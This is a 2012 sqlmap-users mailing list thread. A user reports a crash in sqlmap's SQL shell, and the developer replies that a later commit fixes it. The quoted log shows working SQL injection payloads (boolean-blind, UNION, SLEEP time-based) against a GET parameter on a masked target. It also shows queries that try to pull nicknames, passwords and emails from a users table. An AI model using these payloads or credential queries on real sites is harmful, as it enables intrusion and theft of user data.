Re: [sqlmap-users] Bug Found in sql-shell!

Wed, 04 Apr 2012 16:17:26 -0700 

Hi Marco.

Thank you for your report and find it fixed with the latest r4969 commit.

Kind regards,
Miroslav Stampar

On Wed, Apr 4, 2012 at 10:19 PM, Marco Mirandola <mmmc...@gmail.com> wrote:

> [22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
> [22:15:51] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> reque
> sts:
> ---
> Place: GET
> Parameter: id
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=12' AND 7690=7690 AND 'coUR'='coUR
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 2 columns
>     Payload: id=12' UNION ALL SELECT NULL,
> CONCAT(0x3a6e617a3a,0x61476a577a70535
> 36676,0x3a6f61623a)# AND 'vhgF'='vhgF
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ
> ---
>
> [22:15:51] [INFO] the back-end DBMS is MySQL
>
> web application technology: Apache
> back-end DBMS: MySQL 5.0.11
> [22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
> ENTER
> sql-shell> select nick, pws from utenti
> [22:15:56] [INFO] fetching SQL SELECT statement query output: 'select
> nick, pws
> from utenti'
> select nick, pws from utenti:    'None'
>
> sql-shell> select nick, pws from utenti
> [22:16:08] [INFO] fetching SQL SELECT statement query output: 'select
> nick, pws
> from utenti'
> select nick, pws from utenti:    'None'
>
> sql-shell> select nick, pws, mail from utenti
> [22:16:32] [INFO] fetching SQL SELECT statement query output: 'select
> nick, pws,
>  mail from utenti'
> [22:16:32] [INFO] the SQL query provided has more than a field. sqlmap
> will now
> unpack it into distinct queries to be able to retrieve the output even if
> we are
>  going blind
> [22:16:32] [INFO] resumed: 4
> the SQL query provided can return 4 entries. How many entries do you want
> to ret
> rieve?
> [a] All (default)
> [#] Specific number
> [q] Quit
> > a
>
> [22:16:36] [INFO] retrieving the length of query output
>
> [22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
> run with
>  the latest development version from the Subversion repository. If the
> exception
>  persists, please send by e-mail to sqlmap-users@lists.sourceforge.netthe 
> follo
> wing text and any information required to reproduce the bug. The
> developers will
>  try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.2
> Operating system: nt
> Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u
> *****************************
> *********************** --sql-shell --threads=5
> Technique: BOOLEAN
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main
>     start()
>   File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573,
> in star
> t
>     action()
>   File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in
> action
>     conf.dbmsHandler.sqlShell()
>   File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line
> 2451, in s
> qlShell
>     output = self.sqlQuery(query)
>   File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line
> 2397, in s
> qlQuery
>     output = inject.getValue(query, fromUser=True)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in
> getValue
>     value = __goInferenceProxy(query, fromUser, expected, batch, unpack,
> charset
> Type, firstChar, lastChar, dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in
> __goInferen
> ceProxy
>     output = __goInferenceFields(expression, expressionFields,
> expressionFieldsL
> ist, payload, expected, num, charsetType=charsetType, firstChar=firstChar,
> lastC
> har=lastChar, dump=dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in
> __goInferen
> ceFields
>     output = __goInference(payload, expressionReplaced, charsetType,
> firstChar,
> lastChar, dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in
> __goInferenc
> e
>     _, length, _ = queryOutputLength(expression, payload)
>   File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in
> queryOutputLen
> gth
>     count, length = bisection(payload, lengthExprUnescaped, expected=
> EXPECTED.IN
> T, charsetType=CHARSET_TYPE.DIGITS)
> TypeError: bisection() got an unexpected keyword argument 'expected'
>
> [*] shutting down at 22:16:36
>
>
> ------------------------------------------------------------------------------
> Better than sec? Nothing is better than sec when it comes to
> monitoring Big Data applications. Try Boundary one-second
> resolution app monitoring today. Free.
> http://p.sf.net/sfu/Boundary-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Better than sec? Nothing is better than sec when it comes to
monitoring Big Data applications. Try Boundary one-second 
resolution app monitoring today. Free.
http://p.sf.net/sfu/Boundary-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to